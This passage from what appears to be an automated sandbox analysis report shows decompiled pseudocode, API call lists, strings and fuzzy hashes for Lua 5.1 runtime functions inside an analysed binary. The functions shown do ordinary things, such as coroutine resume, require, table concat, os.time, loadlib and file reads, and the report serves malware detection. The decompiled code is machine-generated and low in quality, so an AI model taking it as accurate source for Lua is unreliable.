luaL_error.LUA5.1(?,too many results to resume,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 10010D86
lua_xmove.LUA5.1(?,?,00000000,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 10010D91

Strings

cannot resume dead coroutine, xrefs: 10010D27
too many arguments to resume, xrefs: 10010CFD
too many results to resume, xrefs: 10010D80

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_xmove.$L_error.lua_checkstack.lua_gettop.$L_where.lua_concat.lua_error.lua_pushlstring.lua_pushvfstring.lua_resume.lua_status.
String ID: cannot resume dead coroutine$too many arguments to resume$too many results to resume
API String ID: 701560387-1036007540
Opcode ID: 905a1aa61fe9e5b74688e8fc42189d15a8cb9343a9e4a1d9d67b084d808537d9
Instruction ID: a278f00ec43a6fe7a9c3c9436f1f8b147466dac960a56c8e5a86a04d0dbf0ec1
Opcode Fuzzy Hash: 905a1aa61fe9e5b74688e8fc42189d15a8cb9343a9e4a1d9d67b084d808537d9
Instruction Fuzzy Hash: 9611C29AA0115132F101E16A3C82EEF229CCF922EAF040039F9549824BF796FA9651F3

Uniqueness

Uniqueness Score: -1.00%

Function 004013C0, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004013C0(void* __esi, intOrPtr _a4) {
				intOrPtr _t2;
				void* _t3;
				char* _t4;
				void* _t7;
				void* _t9;
				void* _t10;
				intOrPtr* _t11;

				_t10 = __esi;
				L00401EE2();
				_t2 = _a4;
				L00401ED0();
				L00401F00();
				_t9 = _t2 - 1;
				L00401F5A();
				L00401F06();
				_t11 = __imp__signal;
				_t3 =  *_t11(2, E00401030, __esi, _t9, __esi, E004010B0, 0, __esi, __esi, _t2, __esi, 0xffffd8ee, "require");
				L00401F60();
				_t7 = _t3;
				_t4 =  *_t11(2, 0, __esi, 1, 0, _t9);
				_push(_t9);
				_push(__esi);
				L00401F7E();
				if(_t7 != 0) {
					_push(0);
					_push(2);
					_push(__esi);
					L00401ED6();
					_push(0xffffffff);
					_push(__esi);
					L00401F4E();
					if(_t4 != 0) {
						_push(0);
						_push(0xffffffff);
						_push(__esi);
						L00401F36();
						if(_t4 == 0) {
							_t4 = "(error object is not a string)";
						}
						E00401060(_t4);
						_push(0xfffffffe);
						_push(_t10);
						L00401F0C();
					}
				}
				return _t7;
			}

0x004013c0
0x004013ce
0x004013d3
0x004013d9
0x004013df
0x004013ee
0x004013f1
0x004013f8
0x004013fd
0x0040140a
0x00401412
0x0040141e
0x00401420
0x00401422
0x00401423
0x00401424
0x0040142e
0x00401430
0x00401432
0x00401434
0x00401435
0x0040143a
0x0040143c
0x0040143d
0x00401447
0x00401449
0x0040144b
0x0040144d
0x0040144e
0x00401458
0x0040145a
0x0040145a
0x00401465
0x0040146a
0x0040146c
0x0040146d
0x00401472
0x00401447
0x0040147a

APIs

lua_getfield.LUA5.1(?,FFFFD8EE,require), ref: 004013CE
lua_pushstring.LUA5.1(?,?,?,FFFFD8EE,require), ref: 004013D9
lua_gettop.LUA5.1(?,?,?,?,FFFFD8EE,require), ref: 004013DF
lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000,?,?,?,?,FFFFD8EE,require), ref: 004013F1
lua_insert.LUA5.1(?,-00000001,?,Function_000010B0,00000000,?,?,?,?,FFFFD8EE,require), ref: 004013F8
signal.MSVCR80 ref: 0040140A
lua_pcall.LUA5.1(?,00000001,00000000,-00000001,?,-00000001,?,Function_000010B0,00000000,?,?,?,?,FFFFD8EE,require), ref: 00401412
signal.MSVCR80 ref: 00401420
lua_remove.LUA5.1(?,-00000001), ref: 00401424
lua_gc.LUA5.1(?,00000002,00000000), ref: 00401435
lua_type.LUA5.1(?,000000FF,?,00000002,00000000), ref: 0040143D
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 0040144E
lua_settop.LUA5.1(?,000000FE,00000000), ref: 0040146D

Strings

(error object is not a string), xrefs: 0040145A
require, xrefs: 004013C3

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: signal$lua_gc.lua_getfield.lua_gettop.lua_insert.lua_pcall.lua_pushcclosure.lua_pushstring.lua_remove.lua_settop.lua_tolstring.lua_type.
String ID: (error object is not a string)$require
API String ID: 1114424619-1477528387
Opcode ID: 7c499a93656aebd7aa693bb811d4c6bc3a83961bdb0e30494f33f6d22160f29a
Instruction ID: caf89fb5af220a5791bbef3d86bcb2cac4474d424cf592ddb5e3ce596935b2d3
Opcode Fuzzy Hash: 7c499a93656aebd7aa693bb811d4c6bc3a83961bdb0e30494f33f6d22160f29a
Instruction Fuzzy Hash: 1511C47174122632E12136774C47F5F210C8F82B98F20023AFB14792F3EBBD960140AE

Uniqueness

Uniqueness Score: -1.00%

Function 00A23DD0, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00A23DD0(void* __esi) {

				_push("alien_buffer");
				L00A23FAA();
				_push(7);
				_push("__index");
				L00A23FC8();
				_push(0);
				_push(E00A23B40);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xa);
				_push("__newindex");
				L00A23FC8();
				_push(0);
				_push(E00A22F20);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xa);
				_push("__tostring");
				L00A23FC8();
				_push(0);
				_push(E00A22DE0);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffe);
				L00A23EF6();
				return 0;
			}

0x00a23dd0
0x00a23dd6
0x00a23ddb
0x00a23ddd
0x00a23de3
0x00a23de8
0x00a23dea
0x00a23df0
0x00a23df5
0x00a23df8
0x00a23dfd
0x00a23dff
0x00a23e05
0x00a23e0a
0x00a23e0c
0x00a23e12
0x00a23e1a
0x00a23e1d
0x00a23e22
0x00a23e24
0x00a23e2a
0x00a23e2f
0x00a23e31
0x00a23e37
0x00a23e3c
0x00a23e3f
0x00a23e44
0x00a23e47
0x00a23e51

APIs

luaL_newmetatable.LUA5.1(?,alien_buffer,00A23E79), ref: 00A23DD6
lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DE3
lua_pushcclosure.LUA5.1(?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DF0
lua_settable.LUA5.1(?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23DF8
lua_pushlstring.LUA5.1(?,__newindex,0000000A,?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer,00A23E79), ref: 00A23E05
lua_pushcclosure.LUA5.1(?,00A22F20,00000000,?,__newindex,0000000A,?,000000FD,?,00A23B40,00000000,?,__index,00000007,?,alien_buffer), ref: 00A23E12
lua_settable.LUA5.1(?,000000FD), ref: 00A23E1D
lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A23E2A
lua_pushcclosure.LUA5.1(?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E37
lua_settable.LUA5.1(?,000000FD,?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E3F
lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A22DE0,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A23E47

Strings

__index, xrefs: 00A23DDD
alien_buffer, xrefs: 00A23DD0
__newindex, xrefs: 00A23DFF
__tostring, xrefs: 00A23E24

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushcclosure.lua_pushlstring.lua_settable.$L_newmetatable.lua_settop.
String ID: __index$__newindex$__tostring$alien_buffer
API String ID: 1410743110-2557586930
Opcode ID: d1a85f93af255fd294592bdb96131696004df1ae57d1ecd8f0cb4aea58d49b4b
Instruction ID: c530b624fc46a8cba4a99545814165fba638c7880aa1f8f6673376fe09f9be74
Opcode Fuzzy Hash: d1a85f93af255fd294592bdb96131696004df1ae57d1ecd8f0cb4aea58d49b4b
Instruction Fuzzy Hash: D2F00762FCEB3631DC12722D3F47F8E04282F23B62E210B30F925384D65A9D631251AE

Uniqueness

Uniqueness Score: -1.00%

Function 10013FA0, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013FA0(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v524;
				intOrPtr _v528;
				void* __ebx;
				void* __esi;
				void* _t11;
				void* _t12;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t37;

				_t44 = __fp0;
				_t38 = __eflags;
				_t32 =  &_v528;
				_t30 = _a4;
				_t31 = E1000F4E0(__ecx, __eflags, _a4, 2, 0x1001ab10, _t32);
				E1000F410(_t22, __eflags, _t30, 1, 5);
				_t29 = E1000F600(_t38, __fp0, _t30, 3, 1);
				_t11 = E10001410(_t38, _t30, 4);
				_t33 = _t32 + 0x30;
				_t39 = _t11;
				if(_t11 > 0) {
					_t12 = E1000F5C0(__eflags, __fp0, _t30, 4);
				} else {
					_t12 = E10001770(_t22, _t39, _t30, 1);
				}
				_t23 = _t12;
				E1000FC00(_t30,  &_v524);
				_t35 = _t33 + 0x10;
				_t40 = _t29 - _t23;
				while(_t29 <= _t23) {
					E10001C30(_t40, _t44, _t30, 1, _t29);
					_t17 = E100014D0(_t40, _t30, 0xffffffff);
					_t37 = _t35 + 0x14;
					_t41 = _t17;
					if(_t17 == 0) {
						E1000F090(_t23, _t30, _t41, _t30, 1, "table contains non-strings");
						_t37 = _t37 + 0xc;
					}
					E1000FB70(_t30, _t41,  &_v524);
					_t35 = _t37 + 4;
					if(_t29 != _t23) {
						E1000FAC0( &_v524, _t31, _v528);
						_t35 = _t35 + 0xc;
					}
					_t29 = _t29 + 1;
				}
				E1000FB40( &_v524);
				return 1;
			}

0x10013fa0
0x10013fa0
0x10013fa0
0x10013fad
0x10013fc8
0x10013fca
0x10013fdc
0x10013fde
0x10013fe3
0x10013fe6
0x10013fe8
0x10013ff7
0x10013fea
0x10013fed
0x10013fed
0x10014003
0x10014007
0x1001400c
0x1001400f
0x10014011
0x10014017
0x1001401f
0x10014024
0x10014027
0x10014029
0x10014033
0x10014038
0x10014038
0x10014040
0x10014045
0x1001404a
0x10014057
0x1001405c
0x1001405c
0x1001405f
0x10014060
0x10014069
0x10014080

APIs

luaL_optlstring.LUA5.1(?,00000002,1001AB10), ref: 10013FBE

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

luaL_checktype.LUA5.1(?,00000001,00000005,?,00000002,1001AB10), ref: 10013FCA

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_optinteger.LUA5.1(?,00000003,00000001,?,00000001,00000005,?,00000002,1001AB10), ref: 10013FD4

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_type.LUA5.1(?,00000004,?,00000003,00000001,?,00000001,00000005,?,00000002,1001AB10), ref: 10013FDE
lua_objlen.LUA5.1(?,00000001), ref: 10013FED
luaL_checkinteger.LUA5.1(?,00000004), ref: 10013FF7
luaL_buffinit.LUA5.1(?,?), ref: 10014007
lua_rawgeti.LUA5.1(?,00000001,00000000), ref: 10014017
lua_isstring.LUA5.1(?,000000FF,?,00000001,00000000), ref: 1001401F
luaL_argerror.LUA5.1(?,00000001,table contains non-strings), ref: 10014033
luaL_addvalue.LUA5.1(?), ref: 10014040
luaL_addlstring.LUA5.1(?,00000000,?), ref: 10014057
luaL_pushresult.LUA5.1(?), ref: 10014069

Strings

table contains non-strings, xrefs: 1001402B

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_addlstring.L_addvalue.L_argerror.L_buffinit.L_checkinteger.L_checktype.L_optinteger.L_optlstring.L_pushresult.lua_isstring.lua_objlen.lua_rawgeti.
String ID: table contains non-strings
API String ID: 958651473-358882004
Opcode ID: 5a1c501da197fc8020709a26230e6511cdc92350b2b794f11aa31fa3a5c81d35
Instruction ID: f736bd550f1392cbbc57157a1f806b7ea01512c7e557fc0dcae11719ac16d088
Opcode Fuzzy Hash: 5a1c501da197fc8020709a26230e6511cdc92350b2b794f11aa31fa3a5c81d35
Instruction Fuzzy Hash: D111DBBA64461132F510D514AC83FFF229DDB557C4F010429FB0069187FAB6FA8501A7

Uniqueness

Uniqueness Score: -1.00%

Function 100139C0, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E100139C0(void* __ebx, void* __eflags, long long __fp0, intOrPtr _a4) {
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char* _t11;
				intOrPtr _t21;
				intOrPtr _t28;
				void* _t30;
				void* _t32;
				long long _t39;

				_t39 = __fp0;
				_t28 = _a4;
				_t11 = E10001410(__eflags, _t28, 1);
				_t30 =  &_v36 + 8;
				if(_t11 > 0) {
					E1000F410(__ebx, __eflags, _t28, 1, 5);
					E10001160(_t28, 1);
					_v36 = E10013B20(__eflags, __fp0, _t28, "sec", 0);
					_v32 = E10013B20(__eflags, __fp0, _t28, "min", 0);
					_v28 = E10013B20(__eflags, __fp0, _t28, "hour", 0xc);
					_v24 = E10013B20(__eflags, __fp0, _t28, "day", 0xffffffff);
					_v20 = E10013B20(__eflags, __fp0, _t28, "month", 0xffffffff) - 1;
					_t21 = E10013B20(__eflags, __fp0, _t28, "year", 0xffffffff) - 0x76c;
					__eflags = _t21;
					_v16 = _t21;
					_v4 = E10013AC0(_t21, _t28, "isdst");
					_t11 =  &_v36;
					__imp__mktime(_t11);
					_t32 = _t30 + 0x68;
				} else {
					__imp__time(0);
					_t32 = _t30 + 4;
				}
				_a4 = _t11;
				if(_t11 != 0xffffffff) {
					asm("fild dword [esp+0x2c]");
					 *((long long*)(_t32 - 8)) = _t39;
					_push(_t28);
					E100018E0();
					return 1;
				} else {
					E100018C0(_t28);
					return 1;
				}
			}

0x100139c0
0x100139c4
0x100139cb
0x100139d0
0x100139d5
0x100139ec
0x100139f4
0x10013a0e
0x10013a1f
0x10013a30
0x10013a3c
0x10013a56
0x10013a5f
0x10013a5f
0x10013a6a
0x10013a73
0x10013a77
0x10013a7c
0x10013a82
0x100139d7
0x100139d9
0x100139df
0x100139df
0x10013a88
0x10013a8c
0x10013aa1
0x10013aa8
0x10013aab
0x10013aac
0x10013abd
0x10013a8e
0x10013a8f
0x10013aa0
0x10013aa0

APIs

lua_type.LUA5.1(?,00000001), ref: 100139CB
time.MSVCRT ref: 100139D9
luaL_checktype.LUA5.1(?,00000001,00000005), ref: 100139EC
lua_settop.LUA5.1(?,00000001,?,00000001,00000005), ref: 100139F4
mktime.MSVCRT ref: 10013A7C
lua_pushnil.LUA5.1(?), ref: 10013A8F
lua_pushnumber.LUA5.1(?), ref: 10013AAC

Strings

hour, xrefs: 10013A19
day, xrefs: 10013A2A
isdst, xrefs: 10013A64
sec, xrefs: 100139FB
min, xrefs: 10013A08
year, xrefs: 10013A50
month, xrefs: 10013A42

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.lua_pushnil.lua_pushnumber.lua_settop.lua_type.mktimetime
String ID: day$hour$isdst$min$month$sec$year
API String ID: 1978836749-997413353
Opcode ID: 8c4b053dfa4f01a120b07b9f2e62d451f82bd773c0de4ff125b5ab391f12d88f
Instruction ID: 8a857ba84ffd18c7d3ef93f64a5562f14a76e3e7c05cd8f0924e4f92b0aec64c
Opcode Fuzzy Hash: 8c4b053dfa4f01a120b07b9f2e62d451f82bd773c0de4ff125b5ab391f12d88f
Instruction Fuzzy Hash: 57216DB480961076E610EB384C86B8F36D4EF4A364F008B25F659AA1C2E7B5E2C1479A

Uniqueness

Uniqueness Score: -1.00%

Function 100162F0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E100162F0(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t5;
				intOrPtr _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t25;

				_t25 = __eflags;
				_t15 = _a8;
				_t20 = _a4;
				_push(_t15);
				E100019F0(_a4, "%s%s", "LOADLIB: ");
				E10001B60(_t25, _a4, 0xffffd8f0);
				_t5 = E10001410(_t25, _t20, 0xffffffff);
				_t26 = _t5;
				if(_t5 == 0) {
					E10001160(_t20, 0xfffffffe);
					_t18 = E100024A0(_t20, 4);
					 *_t18 = 0;
					E10001B90(_t16, __eflags, _t20, 0xffffd8f0, "_LOADLIB");
					E10001F20(__eflags, _t20, 0xfffffffe);
					_push(_t15);
					E100019F0(_t20, "%s%s", "LOADLIB: ");
					E100013D0(__eflags, _t20, 0xfffffffe);
					E10001DA0(__eflags, _t20, 0xffffd8f0);
					return _t18;
				} else {
					return E10001810(_t26, _t20, 0xffffffff);
				}
			}

0x100162f0
0x100162f1
0x100162f6
0x100162fa
0x10016306
0x10016311
0x10016319
0x10016321
0x10016323
0x10016337
0x10016344
0x10016351
0x10016357
0x1001635f
0x10016364
0x10016370
0x10016378
0x10016383
0x10016390
0x10016325
0x10016332
0x10016332

APIs

lua_pushfstring.LUA5.1(?,%s%s,LOADLIB: ,?,?,?,100161C2,?,?,00000000,?,?,10016164,?,00000000,00000000), ref: 10016306
lua_gettable.LUA5.1(?,FFFFD8F0,?,%s%s,LOADLIB: ,?,?,?,100161C2,?,?,00000000,?,?,10016164,?), ref: 10016311
lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,?,%s%s,LOADLIB: ,?,?,?,100161C2,?,?,00000000,?), ref: 10016319
lua_touserdata.LUA5.1(?,000000FF), ref: 10016328
lua_settop.LUA5.1(?,000000FE,?), ref: 10016337
lua_newuserdata.LUA5.1(?,00000004,?,000000FE,?), ref: 1001633F
lua_getfield.LUA5.1(?,FFFFD8F0,_LOADLIB,?,00000004,?,000000FE,?), ref: 10016357
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,_LOADLIB,?,00000004,?,000000FE,?), ref: 1001635F
lua_pushfstring.LUA5.1(?,%s%s,LOADLIB: ,?,?,000000FE,?,FFFFD8F0,_LOADLIB,?,00000004,?,000000FE,?), ref: 10016370
lua_pushvalue.LUA5.1(?,000000FE,?,%s%s,LOADLIB: ,?,?,000000FE,?,FFFFD8F0,_LOADLIB,?,00000004,?,000000FE,?), ref: 10016378
lua_settable.LUA5.1(?,FFFFD8F0,?,000000FE,?,%s%s,LOADLIB: ,?,?,000000FE,?,FFFFD8F0,_LOADLIB,?,00000004,?), ref: 10016383

Strings

_LOADLIB, xrefs: 10016346
%s%s, xrefs: 10016300, 1001636A
LOADLIB: , xrefs: 100162FB, 10016365

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushfstring.$lua_getfield.lua_gettable.lua_newuserdata.lua_pushvalue.lua_setmetatable.lua_settable.lua_settop.lua_touserdata.lua_type.
String ID: %s%s$LOADLIB: $_LOADLIB
API String ID: 680809540-3865023319
Opcode ID: 9232dd84dc5fced9297b8613752410f8e1d6914781eabab9d74604761d50d4a1
Instruction ID: 162198198692a2984da769e1676c60139666cb7f11b9820079c2968c455f8932
Opcode Fuzzy Hash: 9232dd84dc5fced9297b8613752410f8e1d6914781eabab9d74604761d50d4a1
Instruction Fuzzy Hash: 2601627A54953239A901E2586C42FDF224DCF871F5B200321F224762DAAF28B68341FE

Uniqueness

Uniqueness Score: -1.00%

Function 10012530, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012530(void* __eflags, void* __fp0, intOrPtr _a4, struct _IO_FILE* _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				char* _t17;
				char* _t19;
				void* _t23;
				char* _t27;
				char* _t29;
				char* _t32;
				signed char _t33;
				char* _t35;
				void* _t39;
				char* _t40;
				char* _t41;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;
				void* _t50;
				void* _t52;
				void* _t56;

				_t56 = __fp0;
				_t42 = _a4;
				_t15 = E10001150(_a4);
				_t43 = _a8;
				_t39 = _t15 - 1;
				clearerr(_a8);
				_t45 = _t44 + 8;
				_t54 = _t39;
				if(_t39 != 0) {
					_t8 = _t39 + 0x14; // 0x13
					E1000F3E0(_t42, _t8, "too many arguments");
					_t33 = _a12;
					_t46 = _t45 + 0xc;
					_t40 = _t39 - 1;
					__eflags = _t40;
					_t17 = 1;
					_a4 = _t40;
					while(1) {
						__eflags = _t17;
						if(__eflags == 0) {
							goto L2;
						}
						_t23 = E10001410(__eflags, _t42, _t33);
						_t49 = _t46 + 8;
						__eflags = _t23 - 3;
						if(__eflags != 0) {
							_t41 = E100016F0(__eflags, _t42, _t33, 0);
							_t50 = _t49 + 0xc;
							__eflags = _t41;
							if(__eflags == 0) {
								L12:
								E1000F090(_t33, _t42, __eflags, _t42, _t33, "invalid option");
								_t50 = _t50 + 0xc;
							} else {
								__eflags =  *_t41 - 0x2a;
								if(__eflags != 0) {
									goto L12;
								}
							}
							_t27 =  *((char*)(_t41 + 1)) - 0x61;
							__eflags = _t27;
							if(__eflags == 0) {
								E10012800(_t41, _t42, _t43, __eflags, _t42, _t43, 0xffffffff);
								_t46 = _t50 + 0xc;
								_t17 = 1;
								goto L19;
							} else {
								_t29 = _t27 - 0xb;
								__eflags = _t29;
								if(__eflags == 0) {
									_t17 = E10012720(__eflags, _t42, _t43);
									_t46 = _t50 + 8;
									goto L19;
								} else {
									__eflags = _t29 - 2;
									if(__eflags != 0) {
										return E1000F090(_t33, _t42, __eflags, _t42, _t33, "invalid format");
									} else {
										_t17 = E10012690(_t42, _t43);
										_t46 = _t50 + 8;
										L19:
										_t40 = _a4;
										goto L20;
									}
								}
							}
						} else {
							_t32 = E10001670(__eflags, _t56, _t42, _t33);
							_t52 = _t49 + 8;
							__eflags = _t32;
							if(__eflags != 0) {
								_t17 = E10012800(_t40, _t42, _t43, __eflags, _t42, _t43, _t32);
								_t46 = _t52 + 0xc;
							} else {
								_t17 = E100126E0(__eflags, _t42, _t43);
								_t46 = _t52 + 8;
							}
							L20:
							_t33 = _t33 + 1;
							_t35 = _t40;
							_t40 = _t40 - 1;
							__eflags = _t35;
							_a4 = _t40;
							if(_t35 != 0) {
								continue;
							} else {
								goto L2;
							}
						}
						goto L26;
					}
					goto L2;
				} else {
					_t17 = E10012720(_t54, _t42, _t43);
					_t46 = _t45 + 8;
					_t33 = _a12 + 1;
					L2:
					if((_a12 & 0x00000020) == 0) {
						__eflags = _t17;
						if(_t17 == 0) {
							E10001160(_t42, 0xfffffffe);
							E100018C0(_t42);
						}
						_t19 = _t33 - _a12;
						__eflags = _t19;
						return _t19;
					} else {
						return E10012160(_t17, _t56, _t42, 0, 0);
					}
				}
				L26:
			}

0x10012530
0x10012533
0x10012539
0x1001253e
0x10012545
0x10012546
0x1001254c
0x1001254f
0x10012551
0x10012580
0x1001258a
0x1001258f
0x10012593
0x10012596
0x10012596
0x10012597
0x1001259c
0x100125a0
0x100125a0
0x100125a2
0x00000000
0x00000000
0x100125a6
0x100125ab
0x100125ae
0x100125b1
0x100125e3
0x100125e5
0x100125e8
0x100125ea
0x100125f1
0x100125f8
0x100125fd
0x100125ec
0x100125ec
0x100125ef
0x00000000
0x00000000
0x100125ef
0x10012604
0x10012604
0x10012607
0x1001262f
0x10012634
0x10012637
0x00000000
0x10012609
0x10012609
0x10012609
0x1001260c
0x10012621
0x10012626
0x00000000
0x1001260e
0x1001260e
0x10012611
0x10012668
0x10012613
0x10012615
0x1001261a
0x1001263c
0x1001263c
0x00000000
0x1001263c
0x10012611
0x1001260c
0x100125b3
0x100125b5
0x100125ba
0x100125bd
0x100125bf
0x100125d0
0x100125d5
0x100125c1
0x100125c3
0x100125c8
0x100125c8
0x10012640
0x10012640
0x10012641
0x10012643
0x10012644
0x10012646
0x1001264a
0x00000000
0x10012650
0x00000000
0x10012650
0x1001264a
0x00000000
0x100125b1
0x00000000
0x10012553
0x10012555
0x1001255e
0x10012561
0x10012564
0x10012568
0x10012669
0x1001266b
0x10012670
0x10012676
0x1001267b
0x10012687
0x10012687
0x1001268a
0x1001256e
0x1001257f
0x1001257f
0x10012568
0x00000000

APIs

lua_gettop.LUA5.1(?,?,?,?,?,100124D9,?,00000000), ref: 10012539
clearerr.MSVCRT ref: 10012546
luaL_checkstack.LUA5.1(?,00000013,too many arguments,?,00000000), ref: 1001258A
lua_type.LUA5.1(?,?,?,?,?,?,00000000), ref: 100125A6
lua_tointeger.LUA5.1(?,?,?,?,?,?,?,?,00000000), ref: 100125B5

Part of subcall function 10012720: luaL_buffinit.LUA5.1(?,?,00000000,?,?,?), ref: 10012734
Part of subcall function 10012720: luaL_prepbuffer.LUA5.1(?,?,?,00000000,?,?,?), ref: 1001273E
Part of subcall function 10012720: fgets.MSVCRT ref: 10012759
Part of subcall function 10012720: luaL_prepbuffer.LUA5.1(?), ref: 10012786
Part of subcall function 10012720: fgets.MSVCRT ref: 10012794
Part of subcall function 10012720: luaL_pushresult.LUA5.1(?), ref: 100127A2
Part of subcall function 10012720: lua_objlen.LUA5.1(?,000000FF,?), ref: 100127B1

Part of subcall function 10012800: luaL_buffinit.LUA5.1(000000FF,?,00000000,?,?,?), ref: 10012814
Part of subcall function 10012800: luaL_prepbuffer.LUA5.1(?,?,?), ref: 1001283A
Part of subcall function 10012800: fread.MSVCRT ref: 1001284D
Part of subcall function 10012800: luaL_pushresult.LUA5.1(?), ref: 10012869
Part of subcall function 10012800: lua_objlen.LUA5.1(?,000000FF), ref: 10012883

luaL_argerror.LUA5.1(?,?,invalid format,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001265C

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

Strings

too many arguments, xrefs: 10012583
invalid option, xrefs: 100125F1
invalid format, xrefs: 10012655

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_prepbuffer.$L_buffinit.L_pushresult.fgetslua_objlen.$L_argerror.L_checkstack.L_error.clearerrfreadlua_getstack.lua_gettop.lua_tointeger.lua_type.
String ID: invalid format$invalid option$too many arguments
API String ID: 2417420854-1309040029
Opcode ID: d7e85bc8049e4060eca9a77a84cae6b6faed82dd468bf8e4a64dc6b551f185ea
